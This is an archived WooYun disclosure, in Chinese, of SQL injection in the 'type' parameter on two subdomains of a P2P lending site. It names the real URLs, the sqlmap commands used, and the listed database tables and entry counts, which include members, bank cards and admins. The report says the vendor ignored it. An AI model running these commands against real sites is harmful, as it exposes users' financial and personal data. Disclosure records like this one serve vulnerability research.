乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-29: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-13: 厂商已经主动忽略漏洞,细节向公众公开
主站的该参数有注入,子站的该参数同样有注入,你不修复那就获取的数据将更大了!~~~
大牛果然是大牛,神器果然是神器,我试着找了测试没找到,还是大牛提交过的参数,看到路人甲发了主站的,想着是不是子站也存在该参数有注入? WooYun: p2p金融皮城金融主站存在高危漏洞(可获取万余名投资者信息) 果真两个子站都有注入点一:
https://m.pcjinrong.com/footer/get?type=1
type存在注入
sqlmap.py -u "https://m.pcjinrong.com/footer/get?type=1" --threads 10 --current-db --current-user --is-dba
Database: db_pcjr[45 tables]+---------------------------+| hc_account_log || hc_activity || hc_admin || hc_adv || hc_adv_position || hc_article || hc_article_class || hc_balance_log || hc_bank_card || hc_borrower || hc_borrower_company || hc_borrower_person || hc_cooperation || hc_customer_service || hc_draw_vote || hc_draw_vote_log || hc_float_income || hc_group_letter || hc_group_letter_read || hc_guarantors || hc_invest || hc_invest_ticket || hc_join || hc_letter || hc_member || hc_message || hc_midnight_balance || hc_pay_log || hc_permission || hc_preview_buy || hc_product || hc_recharge || hc_repayment_borrower || hc_repayment_invest || hc_session || hc_sms_log || hc_trading_record || hc_withdraw_deposit || hc_withdraw_log || hc_wx_config || hc_wx_errlogin || hc_wx_keyword || hc_wx_menu || hc_wx_root || hc_yesterday_product_info |+---------------------------+Database: db_pcjr+---------------------------+---------+| Table | Entries |+---------------------------+---------+| hc_sms_log | 55808 || hc_pay_log | 55640 || hc_account_log | 47648 || hc_balance_log | 47573 || hc_recharge | 41409 || hc_repayment_invest | 35050 || hc_letter | 30289 || hc_draw_vote_log | 26246 || hc_member | 14829 || hc_trading_record | 13002 || hc_withdraw_deposit | 5537 || hc_bank_card | 5247 || hc_invest_ticket | 2304 || hc_repayment_borrower | 703 || hc_group_letter_read | 348 || hc_product | 224 || hc_midnight_balance | 178 || hc_session | 152 || hc_borrower_person | 138 || hc_yesterday_product_info | 104 || hc_preview_buy | 98 || hc_permission | 92 || hc_cooperation | 73 || hc_article | 69 || hc_draw_vote | 67 || hc_withdraw_log | 43 || hc_wx_keyword | 42 || hc_borrower_company | 25 || hc_admin | 24 || hc_article_class | 9 || hc_wx_menu | 9 || hc_wx_errlogin | 8 || hc_activity | 7 || hc_guarantors | 5 || hc_group_letter | 1 || hc_wx_config | 1 || hc_wx_root | 1 |+---------------------------+---------+| hc_sms_log | 55808 || hc_pay_log | 55640 || hc_account_log | 47648 || hc_member | 14829 || hc_admin | 24 |
上万的数据信息,一万多的用户,24个管理员,五万多的记录信息,相信如果不修复,过段时间会更多信息吧!~~~赶紧修复把!~~~注入点二:
http://wx.pcjinrong.com/footer/get?type=1
依旧是type存在注入
sqlmap.py -u "http://wx.pcjinrong.com/footer/get?type=1" --threads 10
测试结果跟第一个注入点一样就不继续了!~~~
过滤!
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)